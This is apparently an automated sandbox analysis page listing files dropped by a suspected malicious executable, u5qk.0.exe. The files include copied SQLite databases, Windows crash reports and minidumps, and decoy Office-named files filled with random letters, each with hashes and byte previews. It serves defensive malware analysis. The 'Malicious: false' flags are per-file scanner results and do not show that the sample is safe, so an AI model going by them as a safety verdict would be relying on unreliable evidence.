PUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\IIEHCFIDHIDGIDHJEHID

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHIDHDAKJDHJKEBFIEHCAAEHD

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VucRf0jboS.exe_e3b9fe92d8dc9b63e4a22d7f28811b1d0fca491_4784956c_5e6cbc41-8248-488b-b2e5-c32ac93c52c3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0816174722533163
Encrypted:	false
SSDEEP:	192:5LUSXnLxE03F1ejsqpeugCzuiFIZ24IO8nDFs:1UqnLx/3F1ejwCzuiFIY4IO8nZ
MD5:	DA472F4FB1B9AC8F5663446CE0AA40B9
SHA1:	55924826B71D57BA60D9664B5A4ACB6EA620482B
SHA-256:	2C29CF97942F62FA46EA41BB89EF4AE223C67D3A92F5E790B21D66A595807E2C
SHA-512:	FDC27469BE65A25BC1748E1398482384D04601C6423B12B94EEFC9E93F3C61CAE31E169883E52F2B597377B167887E4FA364163B6FC3EC11D00150F477B7ACAF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.7.9.1.9.9.8.7.7.8.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.7.9.2.1.2.8.4.6.6.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.6.c.b.c.4.1.-.8.2.4.8.-.4.8.8.b.-.b.2.e.5.-.c.3.2.a.c.9.3.c.5.2.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.f.7.d.1.3.c.-.b.e.7.a.-.4.a.b.2.-.9.0.3.1.-.0.f.6.1.8.0.0.7.5.a.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.u.c.R.f.0.j.b.o.S...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.c.-.0.0.0.1.-.0.0.1.4.-.8.3.e.1.-.3.9.d.0.3.1.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.0.7.4.4.6.b.1.c.1.d.a.7.0.4.0.3.5.9.0.8.0.f.3.1.5.6.3.5.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.1.0.c.b.b.b.1.5.c.e.4.2.e.4.3.2.8.4.4.1.1.0.9.6.6.8.e.b.d.a.4.d.4.b.7.c.1.5.e.b.!.V.u.c.R.f.0.j.b.o.S...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5qk.0.exe_d28fc939c8c997f1a81a69322f9c419efdcd2ec_56ba69cb_0f5fb6c2-8ef4-4c98-a11e-bcca98cc3e58\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1431558460688327
Encrypted:	false
SSDEEP:	192:S7WXuSqXJy0tIvdjsqZrP2f9HmzuiFjZ24IO8t:pXuSqXJ5tIvdjlCGzuiFjY4IO8t
MD5:	C681FF140109146BDC2095F0ABE703FA
SHA1:	C3882630A84C9B7275CDB62A8EB05A77B483BBE6
SHA-256:	93F8F411B3A480BC4815EC28030A2D7AC30D02896CE6534266CFF4DFFEF2BB40
SHA-512:	EC8835984663529D2FD41DD6BA624960B91044AD5906AE11B44183FB5127D7A3E6900E716B11C3A0C7B3B116286EE2A9AD3BF4BA147B6CA04D49657F0A0CA20B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.7.9.4.3.9.6.7.5.4.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.7.9.4.5.2.1.7.5.3.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.5.f.b.6.c.2.-.8.e.f.4.-.4.c.9.8.-.a.1.1.e.-.b.c.c.a.9.8.c.c.3.e.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.1.2.d.4.0.d.-.b.7.b.8.-.4.f.9.a.-.b.5.9.b.-.1.6.0.c.9.a.b.f.6.5.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.q.k...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.c.-.0.0.0.1.-.0.0.1.4.-.9.8.c.8.-.8.b.d.3.3.1.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.5.7.8.d.9.1.6.0.2.1.2.3.e.b.5.e.a.0.d.7.3.0.3.2.c.a.9.a.5.c.0.0.0.0.f.f.f.f.!.0.0.0.0.0.b.7.6.3.9.2.2.6.5.5.1.0.9.3.2.c.5.d.a.4.8.e.c.c.d.3.4.f.1.2.a.9.0.7.a.7.a.5.2.!.u.5.q.k...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER584E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 23:32:00 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51132
Entropy (8bit):	2.8415651064071348
Encrypted:	false
SSDEEP:	384:WT5QY7JT+9eSzQ2jE1jiNetkEjc0wYX7wkJEeoXq9:+WGg9eSzQ2jE1WNe7jc0BdOq9
MD5:	0F420530F139029D70FE671D4D5B3D47
SHA1:	3E59DEA3501147D89ED2E0A828977451703FDE91
SHA-256:	162A442A30C7A819B43C6272A9329A7B26CD56FF9AC71740672820F404F1BCC4
SHA-512:	002B573319D58105AB26F4025BE49A86E9F33DD080F98A9FA675962535E7A16B7FF9D250714AA1C9C8EB8AF862E79B80B44C4CD8637A3DC070E000CDAA586178
Malicious:	false
Preview:	MDMP..a..... .......p9,f............4...........H...H.......d....#......t...D?..........`.......8...........T............:...............(...........*..............................................................................eJ......x+......GenuineIntel............T...........;9,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B2D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8334
Entropy (8bit):	3.696089881232681
Encrypted:	false
SSDEEP:	192:R6l7wVeJvy607j6Y9lSU1tngmfqQjpDG89bWZsfqSm:R6lXJq607j6YvSU19gmfqMWyfW
MD5:	49B2C7425E8BEB44FA9921966DC4E498
SHA1:	C7B3275B2D099779C9FDF6E2BAA8D51EE3CFF6CF
SHA-256:	A12BBE1D80C0B46B42EAD28B07D42CC307E72474BE4F048E84E55650F85C5D42
SHA-512:	D25D1A81827C560F53B48A813A56F9FD47274E3740F7040D3A5A62A2D9B34C4DBF793D661EE9BF39BE2592FED3BC546F8423077EBB72C574C7F7F970866B08F2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BCB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.463178001256605
Encrypted:	false
SSDEEP:	48:cvIwWl8zsuJg77aI974WpW8VYBYm8M4J8n77FFaC+q8PfoIffwITI3d:uIjfkI79x7VZJ8nfPMfBffwITI3d
MD5:	86282E9F1B00B198AF1D9E63FC586C27
SHA1:	3A5CE31BD434BC61C3CBCE1315F010E8C51BC029
SHA-256:	F16BD8EB5F38B4BAFE50B0DEFDBC5F43DB3228ECFB1572C57B42AC1D38ECA0B4
SHA-512:	B6BA90EDF487403719963AB45A55BA3C5023CDC8F2D3EFDA6FBCE68779162AA2124F08C26A4780AAF2C71ADFC51C64DB71252970843D5B7C10A87B42A36ACB2D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297514" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB552.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Apr 26 23:32:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	62430
Entropy (8bit):	2.7239493318959074
Encrypted:	false
SSDEEP:	384:jqoGFAF4Mm1gExBMBkDTi/TRdPcqWVetkX57HH:uFAi1gEL5TQTRdPED57n
MD5:	0CE89B994D41A433E244E5ACC847ACE1
SHA1:	CFF7324C3AFAFF049E23335A8663D065347D38A7
SHA-256:	2D1029A71E5575D3CBAB933E0F2197A0006DF1927A79938D6400B15C0ED94C50
SHA-512:	227CB6C2111630AC25DB8FB1522DA0A65C645A33B25A1D96AD035E1CD1829FF6515022E043F2742BD8AC909E1A424F5040C5A6A62EDD766F586BF97C34662D3C
Malicious:	false
Preview:	MDMP..a..... ........9,f............4............ ..<...........v9..........T.......8...........T............Z..............((.........................................................................................eJ.............GenuineIntel............T.......\...A9,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB776.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6304
Entropy (8bit):	3.715310945053825
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbU5868YOlbZCxggaMQU089bQRsfKYlGm:R6l7wVeJA868Y8GpD089bQRsfXwm
MD5:	2CA3D36EFFF67812E3A1D66F5C0DB13C
SHA1:	F3D759BFEAC94E8C976F12CF837CF7D2E312E865
SHA-256:	59B4088AEBB4C27FD154BF5F98CDA2525BCCFC46E02B3C94E529E8877C7C04BF
SHA-512:	3CE0799C79633F54CCAF3FF962BD8660EE88A788241A39AA0930485C63EE660649431775B4C987B8E6CA706AA9BAB4918852DDA25B2068F01309F56EC42A65BC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7D5.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.433645455298645
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg77aI974WpW8VYgYm8M4JFmUoFgJ+q8SVT/3/4RAd:uIjffI79x7V0JTv3/4RAd
MD5:	C10C920335CEBA9C65300DC3817B7B18
SHA1:	AF33E321438E5E6E7EB00B096B30E2E2B301360E
SHA-256:	83280C71134B52E6C5C0519C47BFEB42DAD8D58478CBCEC036869809AB857870
SHA-512:	206928713771FA5A8FE3B4FC0F87710BFF9DE7752858838809C0BAC23659B6EDA6F10575C269EC6418E46AF1BDA5A203D6D0C1EEDA3B0C0920D45E47ED1C70A5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297515" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\NWTVCDUMOB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\SQRKHNBNYN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699088014379539
Encrypted:	false
SSDEEP:	24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
MD5:	BF469DD8C21F5160EACD49BB59E9A370
SHA1:	2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
SHA-256:	9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
SHA-512:	FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
Malicious:	false
Preview:	SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

C:\ProgramData\SQRKHNBNYN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699088014379539
Encrypted:	false
SSDEEP:	24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
MD5:	BF469DD8C21F5160EACD49BB59E9A370
SHA1:	2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
SHA-256:	9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
SHA-512:	FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
Malicious:	false
Preview:	SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

C:\ProgramData\ZBEDCJPBEY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
